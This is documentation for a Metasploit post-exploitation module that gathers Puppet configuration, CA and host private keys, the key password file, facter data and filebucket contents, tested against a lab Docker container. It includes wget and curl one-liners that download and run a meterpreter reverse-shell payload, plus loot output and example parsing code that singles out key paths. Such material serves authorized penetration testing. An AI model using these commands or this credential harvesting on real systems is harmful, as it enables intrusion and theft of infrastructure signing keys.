
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/post/linux/gather/puppet.md

Vulnerable Application

This module collects Puppet configuration files, credentials (CA and host key material plus the key password file), host information from facter, installed modules and packages, and the contents of the local filebucket.

Docker-compose Install

Fetch the Puppet compose files from the voxpupuli/crafty repository and bring the stack up:

```
mkdir /tmp/puppet
wget https://raw.githubusercontent.com/voxpupuli/crafty/main/puppet/oss/.env -O /tmp/puppet/.env
wget https://raw.githubusercontent.com/voxpupuli/crafty/main/puppet/oss/compose.yaml -O /tmp/puppet/compose.yaml
docker-compose -f /tmp/puppet/compose.yaml up
```

Now create some content so there is something interesting to pull. The first command opens a shell in the container; the remaining three are run inside it:

```
docker exec -it puppet_puppet_1 /bin/bash
echo test >> /tmp/TestFile
puppet filebucket -l backup /tmp/TestFile
puppet module install puppetlabs-apache
```

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Get an initial shell on the box

  4. Do: use post/linux/gather/puppet

  5. Do: set session [#]

  6. Do: run

  7. You should get information about the puppet install and host.

Options

FILEBUCKET

If file bucket items should be pulled. Defaults to true

PUPPET

Location of puppet executable if not in a standard location. This is added to a list of default locations which includes /opt/puppetlabs/puppet/bin/puppet.

FACTER

Location of facter executable if not in a standard location. This is added to a list of default locations which includes /opt/puppetlabs/puppet/bin/facter.
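The following Ruby is an added example, not code from the Metasploit module, showing the two pieces of logic the options above describe: resolving the puppet binary from a user override plus a default search list, and turning `puppet config print` and `puppet filebucket -l` output into the configuration and filebucket tables the module reports. Only `/opt/puppetlabs/puppet/bin/puppet` comes from the page; the other default paths, the list of secret-bearing settings, and the sample command output are assumptions constructed for this example.

```ruby
# Added example (not the module's own code). Demonstrates binary
# resolution per the PUPPET option and parsing of puppet CLI output.

# Search order: /opt/puppetlabs/puppet/bin is the documented default,
# the remaining entries are assumed common install locations.
DEFAULT_PUPPET_PATHS = %w[
  /opt/puppetlabs/puppet/bin/puppet
  /opt/puppetlabs/bin/puppet
  /usr/bin/puppet
  /usr/local/bin/puppet
].freeze

# Puppet settings whose values point at private keys or the key
# password file (assumed list chosen for this example).
SECRET_SETTINGS = %w[cakey hostprivkey passfile].freeze

# Return the first candidate accepted by the predicate. The override
# (the PUPPET option) is tried before the defaults; nil if none exist.
def resolve_binary(override, defaults = DEFAULT_PUPPET_PATHS, &exists)
  exists ||= ->(path) { File.executable?(path) }
  [override, *defaults].compact.find { |path| exists.call(path) }
end

# `puppet config print` emits one "setting = value" line per setting.
def parse_config_print(text)
  text.each_line.with_object({}) do |line, cfg|
    key, value = line.strip.split(/\s*=\s*/, 2)
    next if key.nil? || key.empty? || value.nil?
    cfg[key] = value
  end
end

# Subset of the config whose values are paths to key material; these
# are the entries worth retrieving to loot first.
def secret_paths(cfg)
  cfg.select { |key, _| SECRET_SETTINGS.include?(key) }
end

# `puppet filebucket -l` lists "<sha256> <YYYY-MM-DD HH:MM:SS> <path>".
FILEBUCKET_LINE = /\A([0-9a-f]{64})\s+(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+(\S.*)\z/

def parse_filebucket_list(text)
  text.each_line.filter_map do |line|
    m = FILEBUCKET_LINE.match(line.strip) or next
    { hash: m[1], date: m[2], filename: m[3] }
  end
end

# Constructed sample output, not captured from a real host.
SAMPLE_CONFIG = <<~OUT
  cacert = /etc/puppetlabs/puppetserver/ca/ca_crt.pem
  cakey = /etc/puppetlabs/puppetserver/ca/ca_key.pem
  hostprivkey = /etc/puppetlabs/puppet/ssl/private_keys/puppet.pem
  passfile = /etc/puppetlabs/puppet/ssl/private/password
  server = puppet
  user = puppet
OUT

SAMPLE_FILEBUCKET = <<~OUT
  9252a75c942da16f7b52cab752797dea4fca18474db9d7eff102842a459b25b3 2023-12-09 12:17:58 /tmp/TestFile
OUT

if $PROGRAM_NAME == __FILE__
  puppet_bin = resolve_binary(ENV['PUPPET'])
  puts "puppet binary: #{puppet_bin || 'not found'}"

  cfg = parse_config_print(SAMPLE_CONFIG)
  secret_paths(cfg).each { |k, v| puts "#{k.ljust(12)} #{v}" }

  parse_filebucket_list(SAMPLE_FILEBUCKET).each do |entry|
    puts "#{entry[:hash][0, 12]}...  #{entry[:date]}  #{entry[:filename]}"
  end
end
```

On a real target the two parsers would be fed the output of `<puppet_bin> config print` and `<puppet_bin> filebucket -l list`; keeping the parsing separate from command execution is what makes the logic testable offline.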

Scenarios

Docker compose as mentioned above

Get initial access to the system

```
resource (puppet.rb)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (puppet.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (puppet.rb)> set srvport 8181
srvport => 8181
resource (puppet.rb)> set target 7
target => 7
resource (puppet.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (puppet.rb)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1:8181/Gc7zrm8CdKGSe2
[*] Server started.
[*] Run the following command on the target machine:
wget -qO CmKyTd1N --no-check-certificate http://1.1.1.1:8181/Gc7zrm8CdKGSe2; chmod +x CmKyTd1N; ./CmKyTd1N& disown
[*] Sending stage (3045380 bytes) to 172.20.0.3
[msf](Jobs:1 Agents:0) post(linux/gather/puppet) > [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.20.0.3:59338) at 2023-12-10 10:38:11 -0500
```

The delivery command uses wget, but the container does not have wget installed. Rewrite it as an equivalent curl command, for example:

```
curl http://1.1.1.1:8181/Gc7zrm8CdKGSe2 > uBgZi2eZ; chmod +x uBgZi2eZ; ./uBgZi2eZ& disown
```

Get a shell in the container with `docker exec -it puppet_puppet_1 /bin/bash` and run the curl command there.

```
resource (puppet.rb)> use post/linux/gather/puppet
resource (puppet.rb)> set session 1
resource (puppet.rb)> set verbose true
verbose => true
[msf](Jobs:1 Agents:1) post(linux/gather/puppet) > run
[+] Stored puppet config to: /root/.msf4/loot/20231210104539_default_172.20.0.3_puppet.conf_250032.txt
[+] Puppet Configuration
====================

Parameter  Value                                       Loot Location
---------  -----                                       -------------
cacert     /etc/puppetlabs/puppetserver/ca/ca_crt.pem  /root/.msf4/loot/20231210104540_default_172.20.0.3_etcpuppetlabs_837639.txt
cakey      /etc/puppetlabs/puppetserver/ca/ca_key.pem  /root/.msf4/loot/20231210104540_default_172.20.0.3_etcpuppetlabs_098956.txt
passfile   /etc/puppetlabs/puppet/ssl/private/password
server     puppet
user       puppet

[+] Puppet Modules
==============

Module             Version
------             -------
puppetlabs-apache  v11.1.0
puppetlabs-concat  v9.0.1
puppetlabs-stdlib  v9.4.1

[*] Retrieving filebucket contents: /tmp/TestFile
[+] Puppet Filebucket Files
=======================

Hash                                                              Date                 Filename       Loot location
----                                                              ----                 --------       -------------
9252a75c942da16f7b52cab752797dea4fca18474db9d7eff102842a459b25b3  2023-12-09 12:17:58  /tmp/TestFile  /root/.msf4/loot/20231210104544_default_172.20.0.3_puppet.filebucke_189638.txt

[+] Stored facter to: /root/.msf4/loot/20231210104545_default_172.20.0.3_puppet.facter_436612.txt
[+] Stored packages to: /root/.msf4/loot/20231210104547_default_172.20.0.3_puppet.packages_320990.txt
[+] Puppet Packages
===============

Package                   Version                                   Source
-------                   -------                                   ------
adduser                   3.118ubuntu5                              apt
apt                       2.4.10                                    apt
base-files                12ubuntu4.4                               apt
base-passwd               3.5.52build1                              apt
base64                    0.2.0                                     puppet_gem
bash                      5.1-6ubuntu1                              apt
benchmark                 0.1.0                                     puppet_gem
bigdecimal                2.0.0                                     puppet_gem
bsdutils                  1:2.37.2-4ubuntu3                         apt
bundler                   2.1.4                                     puppet_gem
ca-certificates           20230311ubuntu0.22.04.1                   apt
ca-certificates-java      20190909ubuntu1.2                         apt
cgi                       0.1.0.2                                   puppet_gem
colored2                  3.1.2                                     puppet_gem
concurrent-ruby           1.1.9                                     puppet_gem
coreutils                 8.32-4.1ubuntu1                           apt
cri                       2.15.11                                   puppet_gem
csv                       3.1.2                                     puppet_gem
dash                      0.5.11+git20210903+057cd650a4ed-3build1   apt
date                      3.0.3                                     puppet_gem
debconf                   1.5.79ubuntu1                             apt
debianutils               5.5-1ubuntu2                              apt
deep_merge                1.2.2                                     puppet_gem
delegate                  0.1.0                                     puppet_gem
did_you_mean              1.4.0                                     puppet_gem
diffutils                 1:3.8-0ubuntu2                            apt
dpkg                      1.21.1ubuntu2.2                           apt
dumb-init                 1.2.5                                     apt
e2fsprogs                 1.46.5-2ubuntu1.1                         apt
erubi                     1.12.0                                    puppet_gem
etc                       1.1.0                                     puppet_gem
facter                    4.5.1                                     puppet_gem
faraday                   2.7.11                                    puppet_gem
faraday-follow_redirects  0.3.0                                     puppet_gem
faraday-net_http          3.0.2                                     puppet_gem
fast_gettext              2.3.0                                     puppet_gem
fcntl                     1.0.0                                     puppet_gem
ffi                       1.15.5                                    puppet_gem
fiddle                    1.0.0                                     puppet_gem
fileutils                 1.4.1                                     puppet_gem
findutils                 4.8.0-1ubuntu3                            apt
fontconfig-config         2.13.1-4.2ubuntu5                         apt
fonts-dejavu-core         2.37-2build1                              apt
forwardable               1.3.1                                     puppet_gem
gcc-12-base               12.3.0-1ubuntu1~22.04                     apt
getoptlong                0.1.0                                     puppet_gem
gettext                   3.4.9                                     puppet_gem
gettext-setup             1.1.0                                     puppet_gem
git                       1:2.34.1-1ubuntu1.10                      apt
git-man                   1:2.34.1-1ubuntu1.10                      apt
gpgv                      2.2.27-3ubuntu2.1                         apt
grep                      3.7-1build1                               apt
gzip                      1.10-4ubuntu4.1                           apt
hiera                     3.12.0                                    puppet_gem
hiera-eyaml               3.4.0                                     puppet_gem
highline                  2.1.0                                     puppet_gem
hocon                     1.3.1                                     puppet_gem
hostname                  3.23ubuntu2                               apt
init-system-helpers       1.62                                      apt
io-console                0.5.6                                     puppet_gem
ipaddr                    1.2.2                                     puppet_gem
irb                       1.2.6                                     puppet_gem
java-common               0.72build2                                apt
json                      2.3.0                                     puppet_gem
jwt                       2.7.1                                     puppet_gem
libacl1                   2.3.1-1                                   apt
libapt-pkg6.0             2.4.10                                    apt
libasound2                1.2.6.1-1ubuntu1                          apt
libasound2-data           1.2.6.1-1ubuntu1                          apt
libattr1                  1:2.5.1-1build1                           apt
libaudit-common           1:3.0.7-1build1                           apt
libaudit1                 1:3.0.7-1build1                           apt
libavahi-client3          0.8-5ubuntu5.1                            apt
libavahi-common-data      0.8-5ubuntu5.1                            apt
libavahi-common3          0.8-5ubuntu5.1                            apt
libblkid1                 2.37.2-4ubuntu3                           apt
libbrotli1                1.0.9-2build6                             apt
libbsd0                   0.11.5-1                                  apt
libbz2-1.0                1.0.8-5build1                             apt
libc-bin                  2.35-0ubuntu3.4                           apt
libc6                     2.35-0ubuntu3.4                           apt
libcap-ng0                0.7.9-2.2build3                           apt
libcap2                   1:2.44-1ubuntu0.22.04.1                   apt
libcom-err2               1.46.5-2ubuntu1.1                         apt
libcrypt1                 1:4.4.27-1                                apt
libcups2                  2.4.1op1-1ubuntu4.7                       apt
libcurl3-gnutls           7.81.0-1ubuntu1.14                        apt
libdb5.3                  5.3.28+dfsg1-0.8ubuntu3                   apt
libdbus-1-3               1.12.20-2ubuntu4.1                        apt
libdebconfclient0         0.261ubuntu1                              apt
liberror-perl             0.17029-1                                 apt
libexpat1                 2.4.7-1ubuntu0.2                          apt
libext2fs2                1.46.5-2ubuntu1.1                         apt
libffi8                   3.4.2-4                                   apt
libfontconfig1            2.13.1-4.2ubuntu5                         apt
libfreetype6              2.11.1+dfsg-1ubuntu0.2                    apt
libgcc-s1                 12.3.0-1ubuntu1~22.04                     apt
libgcrypt20               1.9.4-3ubuntu3                            apt
libgdbm-compat4           1.23-1                                    apt
libgdbm6                  1.23-1                                    apt
libglib2.0-0              2.72.4-0ubuntu2.2                         apt
libgmp10                  2:6.2.1+dfsg-3ubuntu1                     apt
libgnutls30               3.7.3-4ubuntu1.2                          apt
libgpg-error0             1.43-3                                    apt
libgraphite2-3            1.3.14-1build2                            apt
libgssapi-krb5-2          1.19.2-2ubuntu0.2                         apt
libharfbuzz0b             2.7.4-1ubuntu3.1                          apt
libhogweed6               3.7.3-1build2                             apt
libidn2-0                 2.3.2-2build1                             apt
libjpeg-turbo8            2.1.2-0ubuntu1                            apt
libjpeg8                  8c-2ubuntu10                              apt
libk5crypto3              1.19.2-2ubuntu0.2                         apt
libkeyutils1              1.6.1-2ubuntu3                            apt
libkrb5-3                 1.19.2-2ubuntu0.2                         apt
libkrb5support0           1.19.2-2ubuntu0.2                         apt
liblcms2-2                2.12~rc1-2build2                          apt
libldap-2.5-0             2.5.16+dfsg-0ubuntu0.22.04.1              apt
liblz4-1                  1.9.3-2build2                             apt
liblzma5                  5.2.5-2ubuntu1                            apt
libmd0                    1.0.4-1build1                             apt
libmount1                 2.37.2-4ubuntu3                           apt
libncurses6               6.3-2ubuntu0.1                            apt
libncursesw6              6.3-2ubuntu0.1                            apt
libnettle8                3.7.3-1build2                             apt
libnghttp2-14             1.43.0-1build3                            apt
libnsl2                   1.3.0-2build2                             apt
libnspr4                  2:4.32-3build1                            apt
libnss3                   2:3.68.2-0ubuntu1.2                       apt
libp11-kit0               0.24.0-6build1                            apt
libpam-modules            1.4.0-11ubuntu2.3                         apt
libpam-modules-bin        1.4.0-11ubuntu2.3                         apt
libpam-runtime            1.4.0-11ubuntu2.3                         apt
libpam0g                  1.4.0-11ubuntu2.3                         apt
libpcre2-8-0              10.39-3ubuntu0.1                          apt
libpcre3                  2:8.39-13ubuntu0.22.04.1                  apt
libpcsclite1              1.9.5-3ubuntu1                            apt
libperl5.34               5.34.0-3ubuntu1.2                         apt
libpng16-16               1.6.37-3build5                            apt
libprocps8                2:3.3.17-6ubuntu2                         apt
libpsl5                   0.21.0-1.2build2                          apt
librtmp1                  2.4+20151223.gitfa8646d.1-2build4         apt
libsasl2-2                2.1.27+dfsg2-3ubuntu1.2                   apt
libsasl2-modules-db       2.1.27+dfsg2-3ubuntu1.2                   apt
libseccomp2               2.5.3-2ubuntu2                            apt
libselinux1               3.3-1build2                               apt
libsemanage-common        3.3-1build2                               apt
libsemanage2              3.3-1build2                               apt
libsepol2                 3.3-1build1                               apt
libsmartcols1             2.37.2-4ubuntu3                           apt
libsqlite3-0              3.37.2-2ubuntu0.1                         apt
libss2                    1.46.5-2ubuntu1.1                         apt
libssh-4                  0.9.6-2ubuntu0.22.04.1                    apt
libssl3                   3.0.2-0ubuntu1.10                         apt
libstdc++6                12.3.0-1ubuntu1~22.04                     apt
libsystemd0               249.11-0ubuntu3.10                        apt
libtasn1-6                4.18.0-4build1                            apt
libtinfo6                 6.3-2ubuntu0.1                            apt
libtirpc-common           1.3.2-2ubuntu0.1                          apt
libtirpc3                 1.3.2-2ubuntu0.1                          apt
libudev1                  249.11-0ubuntu3.10                        apt
libunistring2             1.0-1                                     apt
libuuid1                  2.37.2-4ubuntu3                           apt
libx11-6                  2:1.7.5-1ubuntu0.3                        apt
libx11-data               2:1.7.5-1ubuntu0.3                        apt
libxau6                   1:1.0.9-1build5                           apt
libxcb1                   1.14-3ubuntu3                             apt
libxdmcp6                 1:1.1.3-0ubuntu5                          apt
libxext6                  2:1.3.4-1build1                           apt
libxi6                    2:1.8-1build1                             apt
libxrender1               1:0.9.10-1build4                          apt
libxtst6                  2:1.2.3-1build4                           apt
libxxhash0                0.8.1-1                                   apt
libzstd1                  1.4.8+dfsg-3build1                        apt
locale                    2.1.3                                     puppet_gem
log4r                     1.1.10                                    puppet_gem
logger                    1.4.2                                     puppet_gem
login                     1:4.8.1-2ubuntu2.1                        apt
logsave                   1.46.5-2ubuntu1.1                         apt
lsb-base                  11.1.0ubuntu4                             apt
matrix                    0.2.0                                     puppet_gem
mawk                      1.3.4.20200120-3                          apt
minitar                   0.9                                       puppet_gem
minitest                  5.13.0                                    puppet_gem
mount                     2.37.2-4ubuntu3                           apt
multi_json                1.15.0                                    puppet_gem
mutex_m                   0.1.0                                     puppet_gem
ncurses-base              6.3-2ubuntu0.1                            apt
ncurses-bin               6.3-2ubuntu0.1                            apt
net-pop                   0.1.0                                     puppet_gem
net-smtp                  0.1.0                                     puppet_gem
net-ssh                   4.2.0                                     puppet_gem
net-telnet                0.2.0                                     puppet_gem
net-tools                 1.60+git20181103.0eebece-1ubuntu5         apt
netbase                   6.3                                       apt
observer                  0.1.0                                     puppet_gem
open3                     0.1.0                                     puppet_gem
openjdk-17-jre-headless   17.0.8.1+1~us1-0ubuntu1~22.04             apt
openjdk-8-jre-headless    8u382-ga-1~22.04.1                        apt
openssl                   3.0.2-0ubuntu1.12                         apt
optimist                  3.0.1                                     puppet_gem
ostruct                   0.2.0                                     puppet_gem
passwd                    1:4.8.1-2ubuntu2.1                        apt
perl                      5.34.0-3ubuntu1.2                         apt
perl-base                 5.34.0-3ubuntu1.2                         apt
perl-modules-5.34         5.34.0-3ubuntu1.2                         apt
power_assert              1.1.7                                     puppet_gem
prime                     0.1.1                                     puppet_gem
procps                    2:3.3.17-6ubuntu2                         apt
pstore                    0.1.0                                     puppet_gem
psych                     3.1.0                                     puppet_gem
puppet                    7.27.0                                    puppet_gem
puppet-agent              7.27.0-1jammy                             apt
puppet-resource_api       1.9.0                                     puppet_gem
puppet7-release           7.0.0-14jammy                             apt
puppet_forge              5.0.3                                     puppet_gem
puppetdb-termini          7.15.0-1jammy                             apt
puppetserver              7.14.0-1jammy                             apt
puppetserver-ca           2.6.0                                     puppet_gem
r10k                      4.0.0                                     puppet_gem
racc                      1.4.16                                    puppet_gem
rake                      13.0.1                                    puppet_gem
rdoc                      6.2.1.1                                   puppet_gem
readline                  0.0.2                                     puppet_gem
readline-ext              0.1.0                                     puppet_gem
reline                    0.1.5                                     puppet_gem
rexml                     3.2.3.1                                   puppet_gem
rss                       0.2.8                                     puppet_gem
ruby2_keywords            0.0.5                                     puppet_gem
scanf                     1.0.0                                     puppet_gem
sdbm                      1.0.0                                     puppet_gem
sed                       4.8-1ubuntu2                              apt
semantic_puppet           1.0.4                                     puppet_gem
sensible-utils            0.0.17                                    apt
singleton                 0.1.0                                     puppet_gem
stringio                  0.1.0                                     puppet_gem
strscan                   1.0.3                                     puppet_gem
sys-filesystem            1.4.4                                     puppet_gem
sysvinit-utils            3.01-1ubuntu1                             apt
tar                       1.34+dfsg-1ubuntu0.1.22.04.1              apt
test-unit                 3.3.4                                     puppet_gem
text                      1.3.1                                     puppet_gem
thor                      1.2.2                                     puppet_gem
timeout                   0.1.0                                     puppet_gem
tracer                    0.1.0                                     puppet_gem
ubuntu-keyring            2021.03.26                                apt
ucf                       3.0043                                    apt
uri                       0.10.0.2                                  puppet_gem
usrmerge                  25ubuntu2                                 apt
util-linux                2.37.2-4ubuntu3                           apt
webrick                   1.6.1                                     puppet_gem
x11-common                1:7.7+23ubuntu2                           apt
xmlrpc                    0.3.0                                     puppet_gem
yaml                      0.1.0                                     puppet_gem
zlib                      1.1.0                                     puppet_gem
zlib1g                    1:1.2.11.dfsg-2ubuntu9.2                  apt

[*] Post module execution completed
```